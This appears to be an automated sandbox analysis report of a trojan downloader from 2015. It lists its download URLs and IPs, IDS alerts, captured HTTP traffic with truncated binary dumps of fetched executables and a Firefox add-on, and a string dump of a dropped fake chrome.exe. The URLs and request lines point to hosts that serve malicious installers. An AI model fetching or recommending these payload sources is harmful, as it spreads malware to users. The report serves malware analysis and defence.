.rsrc 1851392 744 1024 1.67936 c371a4ceeaca9a313ed53d0659fe377e
.reloc 1859584 12 512 0.070639 8a836da960b6068c7c28afb6f938b8af

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://partners.kullanicilar-1.ws/remote/confirmInstall?aid=00000666&h=4124-460A-77F0-735E-F419-E5C6-8F37-41AC&i=&c=b66ab1ff49490757600b68d6637265b6&sid=00000666 104.31.89.124
hxxp://partners.kullanicilar-1.ws/remote/getPluginInstallFileFirefox?i=MG0b 104.31.89.124
hxxp://partners.kullanicilar-1.ws/remote/getSetup?v=100&aid=00000666&sid=00000666 104.31.89.124
hxxp://partners.kullanicilar-1.ws/static/Cin.exe 104.31.89.124
hxxp://partners.kullanicilar-1.ws/static/wget.exe 104.31.89.124
hxxp://partners.kullanicilar-1.ws/static/chrome.exe 104.31.89.124
hxxp://partners.kullanicilar-1.ws/remote/getUpdate?&aid=00000666&sid=00000666&version=100&i=MG0b 104.31.89.124
hxxp://partners.kullanicilar-10.ws/remote/getUpdate?&aid=00000666&sid=00000666&version=100&i=MG0b 104.27.154.75
hxxp://partners.kullanicilar-1.ws:80/static/chrome.exe 104.31.89.124


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /static/wget.exe HTTP/1.1
Host: partners.kullanicilar-1.ws
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 19 Aug 2015 04:24:58 GMT
Content-Type: application/x-msdownload
Content-Length: 73216
Connection: keep-alive
Set-Cookie: __cfduid=db969f93b067bbf2ff6259b14ab26968e1439958298; expires=Thu, 18-Aug-16 04:24:58 GMT; path=/; domain=.kullanicilar-1.ws; HttpOnly
Last-Modified: Thu, 01 Jul 1999 17:36:36 GMT
ETag: "102b04a8-11e00-34e9a8b1d1100"
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 218317852d97269c-FRA
MZ......................@.............................................
..!..L.!this is a Windows NT character-mode executable..$.PE..L.....|7
................. .......... .............@..............:............
....................... ..........................<................
......................................................................
.............................UPX0....................................U
PX1..... [email protected]...........................
[email protected]!....=..s.L...........|..&..2.{H......h......;.......
=.8B.u..E......vo.....;..v....p....Ys5.....h.=...HSVJ.u.M.p..`..E..?..
t .~.;p.r....`.}.v...PC.............3.}.C.1..^[..E....##.....4.P^.....
.....s....C.0Sunday..g?.Mo.Tues.Wedn..`..Thur.Fri'Sat...s..E?93-....'!
.Januar0Febr.l;..M.ch_Ap&l.<..lMT.Junely....Augustueptember.Octo.-.
...Nov..Dec....wqke_Y...{SMGA;5.2 ,.....u..].9..?..Z...PFJ..E.....[...
...PC_..w....}..t.:.t.....e..).<\]u.t.Y.....LbY.l.xb.]}.~.....M.Gw.
....)..]...u.VWU....F.otw.dg.....X........7.]_^.yxwutsrpnmjhg.....cbaZ
YXWVUTSROMIHGEDCBA%[email protected]..:.j......r.....C>.....Y.,......e.o..3
*.KH....`.M...O.....k...7N......,....a.DW_.... ....R..E...K.A...3....&
......G...8%t...7..s...C..:.....*...!0.......'?...h...$.$......2C<.
.1...G....p....WE ..t.k......ZM.....Q~|PS.....N..S....,......6.....-..
...=.....i..x....b7.~.....}h.!.r.R...!..r..-.){.2.....o...t]~.. V...A.
9]?..............._...;0r,.9w'k.....7..C..0..k....cw...\fr.v...c...7%9
.}!S....r.fN......F..h...w!C..\....L....i..a..[.Y.yA......O.'"F.r.
<<< skipped >>>


GET /remote/confirmInstall?aid=00000666&h=4124-460A-77F0-735E-F419-E5C6-8F37-41AC&i=&c=b66ab1ff49490757600b68d6637265b6&sid=00000666 HTTP/1.1
Host: partners.kullanicilar-1.ws
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 19 Aug 2015 04:24:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dde63c632e0c5681ce7dbc9747f2a17dd1439958284; expires=Thu, 18-Aug-16 04:24:44 GMT; path=/; domain=.kullanicilar-1.ws; HttpOnly
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 2183172c736a2366-FRA
8..aid:MG0b..0..HTTP/1.1 200 OK..Date: Wed, 19 Aug 2015 04:24:44 GMT..
Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Co
nnection: keep-alive..Set-Cookie: __cfduid=dde63c632e0c5681ce7dbc9747f
2a17dd1439958284; expires=Thu, 18-Aug-16 04:24:44 GMT; path=/; domain=
.kullanicilar-1.ws; HttpOnly..Cache-Control: private, must-revalidate.
.pragma: no-cache..expires: -1..Vary: Accept-Encoding..Server: cloudfl
are-nginx..CF-RAY: 2183172c736a2366-FRA..8..aid:MG0b..0......


GET /remote/getPluginInstallFileFirefox?i=MG0b HTTP/1.1


Host: partners.kullanicilar-1.ws


HTTP/1.1 200 OK
Date: Wed, 19 Aug 2015 04:24:45 GMT
Content-Type: application/octet-stream
Content-Length: 15901
Connection: keep-alive
Set-Cookie: __cfduid=dde63c632e0c5681ce7dbc9747f2a17dd1439958284; expires=Thu, 18-Aug-16 04:24:44 GMT; path=/; domain=.kullanicilar-1.ws; HttpOnly
Cache-Control: must-revalidate, post-check=0, pre-check=0, private
Expires: 0
Content-Description: File Transfer
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename="MG0b.xpi"
Server: cloudflare-nginx
CF-RAY: 2183173073f62366-FRA
PK.........3.G..._............harness-options.json.V[o.0.~.....L..q...
.a.n.&U...9...8vj;.U......i.h/....\.s|.....uP$...>O.R./:7^...n..%.d
.B*....G..9.}..T..$~.s.....t.pr...; JB..[=...............3..H.E..n....
z...z8'&LL.2X..X.([email protected],_P.sx......Y.w.......~}......s..{h
U..Y4.O..,.g0...x<.~.M.(D..?..I44X<....l8#..9.O..h..&.S.M....@).
u....-..a......JH.k...l......n...g&.o.(C4....!.m'.M.t.,....;|S...k*..B
3..kc......A.5Z..".}`$...h.......x.&2....Q.....!^....b....a.^...S.p#..
b..KZk.)z`].L...h....b..").ex;.S.-............F).......{......e:...gT.
.<._\'.....,.....Y..|".O..n..n..i.uv.3s)..Y....f.`.....P......_'...
b.!."..H.x.....\]@A*...1...\..`p*......n...X.;.L;..r..YR.h!.d.Np..wr.I
.Tk.V..PMB.?.l..3..=..a..=}W...T`_......2..1.O.q.....l..:.0.';@#M..\..
.J......|}...PK.........3.G................locale/nothing.txtPK.......
..3.G................defaults/preferences/prefs.jsPK.........3.G......
......#...resources/addon-sdk/lib/nothing.txtPK.........3.GL........7.
.,...resources/screenshottttt/data/page-script.js...r...=3....!e)..N.*
-...N.llg-'.V..P"d1.mI..&....... %%.........~pn.....q^xaxr.....3{....'
oH....~.....)~Y..qRdA|.*K.WI...b... .....C.n.u..o.R/.r....!....9lK...c
...}..IH"...0$.M...~.)..r....4.D.m%.a.......O>\..&Q.....a.E......|7
n......$.kU._k..K...$....%.f.Xe..P.......0$L..j...5...=.Hy..:....U....
.......Z.I.ojJs....3IU..SCSy.._.T....N..0....QL..........D.....N...o..
.....4.R....JBw-..f...../.-.A....o....W.Q...P....a....//.uq.|[email protected]
[email protected].. sRt....uhv:.b.M....e...t..Nw....~_XW.2....
<<< skipped >>>

GET /remote/getSetup?v=100&aid=00000666&sid=00000666 HTTP/1.1


Host: partners.kullanicilar-1.ws


HTTP/1.1 200 OK
Date: Wed, 19 Aug 2015 04:24:45 GMT
Content-Type: application/octet-stream
Content-Length: 1843200
Connection: keep-alive
Set-Cookie: __cfduid=de3a9dcec2e0930d1e917b09bedc4886b1439958285; expires=Thu, 18-Aug-16 04:24:45 GMT; path=/; domain=.kullanicilar-1.ws; HttpOnly
Cache-Control: must-revalidate, post-check=0, pre-check=0, private
Expires: 0
Content-Description: File Transfer
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename="icns_100.exe"
Server: cloudflare-nginx
CF-RAY: 2183173204212366-FRA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....ZRU
............................*6... ...@....@.. ........................
[email protected]....@..............
.........`......................................................86....
........... ..H............text...@.... ...................... ..`.rsr
c........@......................@[email protected].......`....................
[email protected]............"......A.......84..................
.........................0..5.........(......r...p(......(....:.......
...*.r5..p.(......*........0..P........(.........89............r9..p(.
...(....9......rM..p(....r_..p..(......X....i2.*.....0...........(....
.....8x............r9..p(....(....9W.....rM..p(....r...p.{.....(......
rM..p(....r...p.{.....(......r...p(.....(.........&.......X....i2.*...
....g..~.......0(..........(....:....*.(......(!.....r...po....t9.....
ou...t=...o....o......r...po.....or...r...por...t:...........87.......
oU...r'..por...o.....{....o....9......(.........X......o....2...:M....
..oU...o........r3..pr;..p.{....rI..p(....(....os.....r'..p.{....(....
os.....rS..p.(....os.....rc..p.{....(....os.....r{..p.{....(....os....
.r...p.{....(....os.....r...p...........r...p.{....s........r...psH...
s........r...psH...s.......s....sK...os....r...p.{....rI..p(........r.
..p..(....os.....r...pr...p(....os......oU.....on.....(%........(....*
.......0..)..........(....9....r...p.r...p(......s........(....9..
<<< skipped >>>

GET /static/Cin.exe HTTP/1.1


Host: partners.kullanicilar-1.ws


HTTP/1.1 200 OK
Date: Wed, 19 Aug 2015 04:24:47 GMT
Content-Type: application/x-msdownload
Content-Length: 534016
Connection: keep-alive
Set-Cookie: __cfduid=dcfb6698627a892a0ff28c055ce4bf6251439958286; expires=Thu, 18-Aug-16 04:24:46 GMT; path=/; domain=.kullanicilar-1.ws; HttpOnly
Last-Modified: Fri, 15 May 2015 13:22:50 GMT
ETag: "102b04a7-82600-5161ebda39e80"
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 2183173d856f2366-FRA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...*.UU
............................v1... ...@....@.. ........................
............@.................................([email protected]...........
.........`.......................................................1....
........... ..H............text........ ...................... ..`.rsr
c...j....@......................@[email protected].......`.......$............
[email protected]........................\..`>...............
............................0..6.......r...p(.......8.............o...
......&.......X....i2.*...........%........(....*..(....*.0..6.......~
.....(....9 ...r...p.....(....o....s...........~....*.......~....*....
....*V(....rm..p~....o....*..V(....r...p~....o....*...0..........(....
s......o....s".....o....*.......0..8.......(....o......s....(....o....
..r...p(.....r...p(....(....*.....*...0"..........(.....(......(....:.
.....(....&.(....(....:E.....(.....{....(.....(.....(....&.(.....(....
.( ...s .....o&......(!.....(....(......(....(......(....(......(....(
......(....(.........&.....*....................0..........r...p(.....
.r...p(......(....9j......(......r...po....:.....(....(......r...p(...
.....r7..po....:.....(....(......r7..p(........9......(....*........0.
.........(....o......s....(....o......*.......0...........(......rs..p
(......*.......F.(....r...p(....*...0..5.......s......r...p.o.....(...
.(....:.....(....s....z.(....*........0..A.......s.......o......o.
<<< skipped >>>

GET /remote/getUpdate?&aid=00000666&sid=00000666&version=100&i=MG0b HTTP/1.1


Host: partners.kullanicilar-1.ws


HTTP/1.1 200 OK
Date: Wed, 19 Aug 2015 04:25:12 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db714f9859b4ba004ebb1fa273d5455d11439958312; expires=Thu, 18-Aug-16 04:25:12 GMT; path=/; domain=.kullanicilar-1.ws; HttpOnly
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 218317dedcb72366-FRA
2..{}..0..HTTP/1.1 200 OK..Date: Wed, 19 Aug 2015 04:25:12 GMT..Conten
t-Type: application/json..Transfer-Encoding: chunked..Connection: keep
-alive..Set-Cookie: __cfduid=db714f9859b4ba004ebb1fa273d5455d114399583
12; expires=Thu, 18-Aug-16 04:25:12 GMT; path=/; domain=.kullanicilar-
1.ws; HttpOnly..Cache-Control: private, must-revalidate..pragma: no-ca
che..expires: -1..Vary: Accept-Encoding..Server: cloudflare-nginx..CF-
RAY: 218317dedcb72366-FRA..2..{}..0..



GET /static/chrome.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: partners.kullanicilar-1.ws:80
Accept: */*


HTTP/1.1 200 OK
Date: Wed, 19 Aug 2015 04:24:59 GMT
Content-Type: application/x-msdownload
Content-Length: 31990778
Connection: close
Set-Cookie: __cfduid=daf7a580e9ed3cd6d35aeeee9603800351439958299; expires=Thu, 18-Aug-16 04:24:59 GMT; path=/; domain=.kullanicilar-1.ws; HttpOnly
Last-Modified: Thu, 19 Feb 2015 11:22:54 GMT
ETag: "102b04a9-1e823fa-50f6f28367f80"
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 21831789a9672708-FRA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........f..{5..{5
..{5...5..{5..z5(.{5...5..{5...5..{5...5..{5...5..{5...5..{5...5..{5Ri
ch..{5........PE..L...Yj>O.....................d...............0...
.@..................................................................K.
.3...L<[email protected]....................
...........................0...............................text...2...
........................ ..`.rdata..5....0......."..............@[email protected]
ata....V...P.......@[email protected]..........
....@[email protected][email protected]..............@..@......................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................@s... s...........
.............................D$..L$....L$.u..D$......S.....D$..d$....D
$.....[...............WVS3..D$...}.G.T$.........D$..T$..D$...}.G.T$...
......D$..T$...u..L$..D$.3......D$......A...L$..T$..D$...........u....
..d$....D$.....r.;T$.w.r.;D$.v.N3...Ou........[^_.........WVU3.3..D$..
.}.GE.T$.........D$..T$..D$...}.G.T$.........D$..T$...u(.L$..D$.3.....
.D$........d$......d$....G...L$..T$..D$...........u......d$....D$.....
r.;T$.w.r.;D$.v.N D$..T$.3. D$..T$.My..................Ou........]
<<< skipped >>>


GET /remote/getUpdate?&aid=00000666&sid=00000666&version=100&i=MG0b HTTP/1.1
Host: partners.kullanicilar-10.ws
Connection: Keep-Alive


HTTP/1.1 403 Forbidden
Date: Wed, 19 Aug 2015 04:25:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db0e2ffd00b72812ff028ffa88a9304cf1439958315; expires=Thu, 18-Aug-16 04:25:15 GMT; path=/; domain=.kullanicilar-10.ws; HttpOnly
Server: cloudflare-nginx
CF-RAY: 218317f254322654-FRA
172d..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".    
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns
="hXXp://VVV.w3.org/1999/xhtml">.  <head>.    <title>Do
mena partners.kullanicilar-10.ws jest utrzymywana na serwerach nazwa.p
l</title>..    <meta http-equiv="content-type" content="text/
html; charset=utf-8" />.    <link rel="stylesheet" href="hXXp://
kf.nazwa.pl/templates/blackdown-template-08.2011/css/style.css" type="
text/css" />.    <link rel="shortcut icon" href="favicon.ico" /&
gt;.    <script type="text/javascript">..      var Links = {.   
       url: 'hXXp://nazwa.pl/domeny-hosting-serwery,4225.html?utm_medi
um=blackdown&utm_source=blackdown&utm_campaign=20000101_strona&utm_ter
m=&utm_content=685x390_',..          redirect: function() {.          
     try {.                    //window.location = Links.url;.        
            parent.location.href = Links.url;.              }.        
      catch(e) {}.              return false;.          },..          
 refresh: function() {.               window.setTimeout('Links.redirec
t()', 8000);.          },..           load: function() {.             
  var obj = this;.              window.onload = function() {.         
         obj.refresh();.              }.          }.     }..     Links
.load();..    function policyButtonClicked() {.        var data = new 
Date();.        data.setTime(data.getTime() (100*365*24*60*60*1000));.
        document.cookie="polityka=true; expires=" data.toGMTString
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

chrome.exe_876:

.text
`.rdata
@.data
.rsrc
@.reloc
SSShx
xSSSh
FTPjKS
FtPj;S
C.PjRV
0.0.0.0-devel
Chrome
ChromeFrame
CHROME_METRO_DLL
Could not find exported function
app\client_util.cc
RelaunchChromeBrowserWithNewCommandLineIfNeeded
Failed to load Chrome DLL from
No valid Chrome version found
ChromeMain
NTDLL.DLL
CHROME_BREAKPAD_PIPE_NAME
1.3.21.115
app\breakpad_win.cc
subresource_url
rsesek_key
hXXp://VVV.google.com/search?q=%s&sourceid=chrome&ie=UTF-8
browser\chrome_process_finder_win.cc
installer\util\google_update_settings.cc
Removed multi-install failure key; switching to channel:
Removed incremental installer failure key; switching to channel:
Failed to write to application's ClientState key
auto-launch-chrome
chrome
chrome-frame
chrome-sxs
do-not-launch-chrome
make-chrome-default
new-setup-exe
register-chrome-browser
register-chrome-browser-suffix
register-dev-chrome
register-url-protocol
rename-chrome-exe
remove-chrome-registration
update-setup-exe
toast-results-key
installer\util\channel_info.cc
Skipping over key "
Failed to open key "
Cannot initialize AppCommands from an invalid key.
installer\util\app_commands.cc
googlechrome
iexplore.exe
googlechromeframe
googlechromeapphost
installer\util\master_preferences.cc
Cannot initialize an AppCommand from an invalid key.
installer\util\app_command.cc
installer\util\language_selector.cc
auto_launch_chrome
chrome_frame
chrome_shortcut_icon_index
import_bookmarks
import_bookmarks_from_file
import_history
import_home_page
import_search_engine
do_not_launch_chrome
make_chrome_default
make_chrome_default_for_user
extensions.settings
kernel32.dll
NtOpenKey
NtCreateKey
NtOpenKeyEx
CreateNamedPipeW
AudioCaptureAllowedUrls
AutoSelectCertificateForUrls
CloudPrintProxyEnabled
CloudPrintSubmitEnabled
ContentPackManualBehaviorURLs
CookiesAllowedForUrls
CookiesBlockedForUrls
CookiesSessionOnlyForUrls
DefaultSearchProviderAlternateURLs
DefaultSearchProviderIconURL
DefaultSearchProviderInstantURL
DefaultSearchProviderKeyword
DefaultSearchProviderSearchTermsReplacementKey
DefaultSearchProviderSearchURL
DefaultSearchProviderSuggestURL
EnableAuthNegotiatePort
EnableOriginBoundCerts
HideWebStoreIcon
ImagesAllowedForUrls
ImagesBlockedForUrls
ImportBookmarks
ImportHistory
ImportHomepage
ImportSavedPasswords
ImportSearchEngine
JavaScriptAllowedForUrls
JavaScriptBlockedForUrls
MetricsReportingEnabled
NotificationsAllowedForUrls
NotificationsBlockedForUrls
PasswordManagerAllowShowPasswords
PasswordManagerEnabled
PluginsAllowedForUrls
PluginsBlockedForUrls
PopupsAllowedForUrls
PopupsBlockedForUrls
ProxyBypassList
ProxyPacUrl
RemoteAccessHostDomain
RemoteAccessHostFirewallTraversal
RemoteAccessHostRequireCurtain
RemoteAccessHostRequireTwoFactor
RemoteAccessHostTalkGadgetPrefix
RestoreOnStartupURLs
URLBlacklist
URLWhitelist
VideoCaptureAllowedUrls
ChromeFrameContentTypes
ChromeFrameRendererSettings
ChromeOsLockOnIdleSuspend
ChromeOsReleaseChannel
ChromeOsReleaseChannelDelegated
DeviceAllowRedeemChromeOsRegistrationOffers
DeviceLocalAccountAutoLoginBailoutEnabled
DeviceLocalAccountAutoLoginDelay
DeviceLocalAccountAutoLoginId
DeviceLoginScreenDefaultHighContrastEnabled
DeviceLoginScreenDefaultLargeCursorEnabled
DeviceLoginScreenDefaultScreenMagnifierType
DeviceLoginScreenDefaultSpokenFeedbackEnabled
DeviceLoginScreenPowerManagement
DeviceLoginScreenSaverId
DeviceLoginScreenSaverTimeout
DeviceMetricsReportingEnabled
DeviceStartUpUrls
EnterpriseWebStoreName
EnterpriseWebStoreURL
HideWebStorePromo
RenderInChromeFrameList
ReportDeviceActivityTimes
ReportDeviceBootMode
ReportDeviceLocation
ReportDeviceNetworkInterfaces
ReportDeviceVersionInfo
SuppressChromeFrameTurndownPrompt
TermsOfServiceURL
CHROME_HEADLESS
CHROME_LOG_FILE
CHROMEOS_SESSION_LOG_DIR
CHROME_CRASHED
CHROME_RESTART
allow-http-background-page
allow-http-screen-capture
apps-checkout-url
apps-gallery-download-url
apps-gallery-url
apps-gallery-update-url
chrome-version
device-management-url
disable-extensions-http-throttling
disable-password-autofill-public-suffix-domain-matching
disable-sync-passwords
disable-sync-typed-urls
disable-web-resources
enable-auth-negotiate-port
enable-password-autofill-public-suffix-domain-matching
enable-autologin
enable-metrics-reporting-for-testing
enable-npn-http
enable-password-generation
enable-quic-https
enable-save-password-bubble
enable-user-controlled-alternate-protocol-ports
enable-websocket-over-spdy
explicitly-allowed-ports
google-base-url
google-search-domain-check-url
ignore-urlfetcher-cert-requests
install-from-webstore
limited-install-from-webstore
pack-extension-key
promo-server-url
proxy-bypass-list
proxy-pac-url
safebrowsing-url-prefix
safebrowsing-download-feedback-url
spelling-service-feedback-url
sync-invalidate-xmpp-login
sync-notification-host-port
sync-url
sync-try-ssltcp-first-for-xmpp
enable-syncfs-directory-operation
translate-script-url
try-chrome-again
variations-server-url
visit-urls
winhttp-proxy-resolver
plugins-metadata-server-url
windows8-search
CHROME_VERSION
>CHROME_PRE_READ_EXPERIMENT
chrome.googleechotest.com
hXXp://pipelining.googleechotest.com/
profile.managed.manual_hosts
profile.managed.manual_urls
profile.managed.custodian_email
profile.managed.custodian_name
profile.icon_version
profile.exited_cleanly
profile.exit_type
session.restore_on_startup
session.restore_on_startup_migrated
session.urls_to_restore_on_startup
intl.app_locale
intl.charset_default
intl.accept_languages
intl.static_encodings
intl.global.charset_default
webkit.webprefs.global.default_font_size
webkit.webprefs.global.default_fixed_font_size
webkit.webprefs.global.minimum_font_size
webkit.webprefs.global.minimum_logical_font_size
webkit.webprefs.global.javascript_enabled
webkit.webprefs.global.javascript_can_open_windows_automatically
webkit.webprefs.global.loads_images_automatically
webkit.webprefs.global.plugins_enabled
webkit.webprefs.global.standard_font_family
webkit.webprefs.global.fixed_font_family
webkit.webprefs.global.serif_font_family
webkit.webprefs.global.sansserif_font_family
webkit.webprefs.global.cursive_font_family
webkit.webprefs.global.fantasy_font_family
webkit.webprefs.standard_font_family
webkit.webprefs.fixed_font_family
webkit.webprefs.serif_font_family
webkit.webprefs.sansserif_font_family
webkit.webprefs.cursive_font_family
webkit.webprefs.fantasy_font_family
webkit.webprefs.fonts.standard
webkit.webprefs.fonts.fixed
webkit.webprefs.fonts.serif
webkit.webprefs.fonts.sansserif
webkit.webprefs.fonts.cursive
webkit.webprefs.fonts.fantasy
webkit.webprefs.fonts.pictograph
webkit.webprefs.fonts.standard.Arab
webkit.webprefs.fonts.fixed.Arab
webkit.webprefs.fonts.serif.Arab
webkit.webprefs.fonts.sansserif.Arab
webkit.webprefs.fonts.standard.Cyrl
webkit.webprefs.fonts.fixed.Cyrl
webkit.webprefs.fonts.serif.Cyrl
webkit.webprefs.fonts.sansserif.Cyrl
webkit.webprefs.fonts.standard.Grek
webkit.webprefs.fonts.fixed.Grek
webkit.webprefs.fonts.serif.Grek
webkit.webprefs.fonts.sansserif.Grek
webkit.webprefs.fonts.standard.Jpan
webkit.webprefs.fonts.fixed.Jpan
webkit.webprefs.fonts.serif.Jpan
webkit.webprefs.fonts.sansserif.Jpan
webkit.webprefs.fonts.standard.Hang
webkit.webprefs.fonts.fixed.Hang
webkit.webprefs.fonts.serif.Hang
webkit.webprefs.fonts.sansserif.Hang
webkit.webprefs.fonts.cursive.Hang
webkit.webprefs.fonts.standard.Hans
webkit.webprefs.fonts.fixed.Hans
webkit.webprefs.fonts.serif.Hans
webkit.webprefs.fonts.sansserif.Hans
webkit.webprefs.fonts.standard.Hant
webkit.webprefs.fonts.fixed.Hant
webkit.webprefs.fonts.serif.Hant
webkit.webprefs.fonts.sansserif.Hant
webkit.webprefs.web_security_enabled
webkit.webprefs.dom_paste_enabled
webkit.webprefs.shrinks_standalone_images_to_fit
webkit.webprefs.inspector_settings
webkit.webprefs.uses_universal_detector
webkit.webprefs.text_areas_are_resizable
webkit.webprefs.java_enabled
webkit.webprefs.tabs_to_links
webkit.webprefs.allow_displaying_insecure_content
webkit.webprefs.allow_running_insecure_content
webkit.webprefs.fonts.standard.Zyyy
webkit.webprefs.fonts.fixed.Zyyy
webkit.webprefs.fonts.serif.Zyyy
webkit.webprefs.fonts.sansserif.Zyyy
webkit.webprefs.fonts.cursive.Zyyy
webkit.webprefs.fonts.fantasy.Zyyy
webkit.webprefs.fonts.pictograph.Zyyy
webkit.webprefs.default_font_size
webkit.webprefs.default_fixed_font_size
webkit.webprefs.minimum_font_size
webkit.webprefs.minimum_logical_font_size
webkit.webprefs.javascript_enabled
webkit.webprefs.javascript_can_open_windows_automatically
webkit.webprefs.loads_images_automatically
webkit.webprefs.plugins_enabled
bookmark_bar.show_on_all_tabs
bookmark_bar.show_apps_shortcut
bookmark_editor.expanded_nodes
password_generation.enabled
profile.password_manager_enabled
profile.password_manager_allow_show_passwords
autologin.enabled
reverse_autologin.enabled
reverse_autologin.rejected_email_list
safebrowsing.enabled
safebrowsing.reporting_enabled
safebrowsing.proceed_anyway_disabled
incognito.mode_availability
search.suggest_enabled
browser.confirm_to_quit
security.cookie_behavior
default_search_provider.synced_guid
default_search_provider.enabled
default_search_provider.search_url
default_search_provider.suggest_url
default_search_provider.instant_url
default_search_provider.icon_url
default_search_provider.encodings
default_search_provider.name
default_search_provider.keyword
default_search_provider.id
default_search_provider.prepopulate_id
default_search_provider.alternate_urls
default_search_provider.search_terms_replacement_key
download.prompt_for_download
alternate_error_pages.enabled
dns_prefetching.startup_list
dns_prefetching.host_referral_list
spdy.disabled
net.http_server_properties
spdy.servers
spdy.alternate_protocol
protocol.disabled_schemes
policy.url_blacklist
policy.url_whitelist
instant_ui.zero_suggest_url_prefix
local_state.multiple_profile_prefs_version
dns_prefetching.enabled
hide_web_store_icon
browser.show_home_button
profile.recently_selected_encodings
browser.clear_data.browsing_history
browser.clear_data.download_history
browser.clear_data.cache
browser.clear_data.cookies
browser.clear_data.passwords
browser.clear_data.form_data
browser.clear_data.hosted_apps_data
browser.clear_data.content_licenses
browser.clear_data.time_period
browser.last_clear_browsing_data_time
browser.enable_spellchecking
browser.enabled_labs_experiments
browser.enable_autospellcorrect
browser.speechinput_censor_results
browser.speechinput_tray_notification_shown_contexts
history.saving_disabled
history.deleting_enabled
settings.force_safesearch
extensions.theme.pack
extensions.theme.id
extensions.theme.images
extensions.theme.colors
extensions.theme.tints
extensions.theme.properties
extensions.ui.developer_mode
extensions.toolbarsize
extensions.toolbar
extensions.commands
plugins.last_internal_directory
plugins.plugins_list
plugins.plugins_disabled
plugins.plugins_disabled_exceptions
plugins.plugins_enabled
plugins.migrated_to_pepper_flash
plugins.removed_old_component_pepper_flash_settings
plugins.show_details
plugins.allow_outdated
plugins.always_authorize
plugins.metadata
plugins.resource_cache_update
browser.check_default_browser
browser.suppress_switch_to_metro_mode_on_set_default
browser.default_browser_setting_enabled
browser.custom_chrome_frame
browser.desktop_notification_position
profile.default_content_settings
profile.content_settings.clear_on_exit_migrated
profile.content_settings.pref_version
profile.content_settings.pattern_pairs
profile.content_settings.whitelist_version
profile.content_settings.plugin_whitelist
profile.block_third_party_cookies
profile.clear_site_data_on_exit
profile.default_zoom_level
profile.per_host_zoom_levels
autofill.data_model_default
autofill.has_paid_with_wallet
autofill.pay_without_wallet
autofill.show_count
autofill.generated_card_bubble_times_shown
bookmarks.editing_enabled
translate.enabled
googlegeolocationaccess.enabled
media.default_audio_capture_device
media.default_video_capture_Device
import_saved_passwords
profile.avatar_index
profile.name
profile.is_managed
printing.enabled
printing.print_preview_disabled
profile.managed.default_filtering_behavior
profile.managed_user_creation_allowed
profile.managed_users
message_center.disabled_extension_ids
message_center.disabled_system_component_ids
message_center.enabled_sync_notifier_ids
profile.last_used
profile.last_active_profiles
profile.profiles_created
profile.created_by_version
profile.info_cache
ssl.rev_checking.enabled
ssl.version_min
ssl.version_max
ssl.cipher_suites.blacklist
ssl.origin_bound_certs.enabled
ssl.ssl_record_splitting.disabled
ssl.unrestricted_ssl3_fallback.enabled
user_experience_metrics.client_id
user_experience_metrics.session_id
user_experience_metrics.low_entropy_source
user_experience_metrics.permuted_entropy_cache
user_experience_metrics.client_id_timestamp
user_experience_metrics.reporting_enabled
user_experience_metrics.initial_logs_as_protobufs
user_experience_metrics.ongoing_logs_as_protobufs
user_experience_metrics.stability.exited_cleanly
user_experience_metrics.stability.stats_version
user_experience_metrics.stability.stats_buildtime
user_experience_metrics.stability.session_end_completed
user_experience_metrics.stability.launch_count
user_experience_metrics.stability.crash_count
user_experience_metrics.stability.incomplete_session_end_count
user_experience_metrics.stability.page_load_count
user_experience_metrics.stability.renderer_crash_count
user_experience_metrics.stability.launch_time_sec
user_experience_metrics.stability.extension_renderer_crash_count
user_experience_metrics.stability.last_timestamp_sec
user_experience_metrics.stability.plugin_stats2
user_experience_metrics.stability.renderer_hang_count
user_experience_metrics.stability.child_process_crash_count
user_experience_metrics.stability.other_user_crash_count
user_experience_metrics.stability.kernel_crash_count
user_experience_metrics.stability.system_unclean_shutdowns
user_experience_metrics.stability.breakpad_registration_ok
user_experience_metrics.stability.breakpad_registration_fail
user_experience_metrics.stability.debugger_present
user_experience_metrics.stability.debugger_not_present
uninstall_metrics.installation_date2
uninstall_metrics.page_load_count
uninstall_metrics.launch_count
uninstall_metrics.uptime_sec
uninstall_metrics.last_launch_time_sec
uninstall_metrics.last_observed_running_time_sec
browser.suppress_default_browser_prompt_for_version
browser.window_placement
task_manager.window_placement
keyword_editor.window_placement
preferences.window_placement
renderer.memory_cache.size
download.default_directory
download.directory_upgrade
savefile.default_directory
savefile.type
selectfile.last_directory
select_file_dialogs.allowed
filebrowser.tasks.default_by_mime_type
filebrowser.tasks.default_by_suffix
download.extensions_to_open
browser.hung_plugin_detect_freq
browser.plugin_message_response_timeout
spellcheck.dictionary
spellcheck.confirm_dialog_shown
spellcheck.use_spelling_service
protocol_handler.excluded_schemes
safe_browsing.client_key
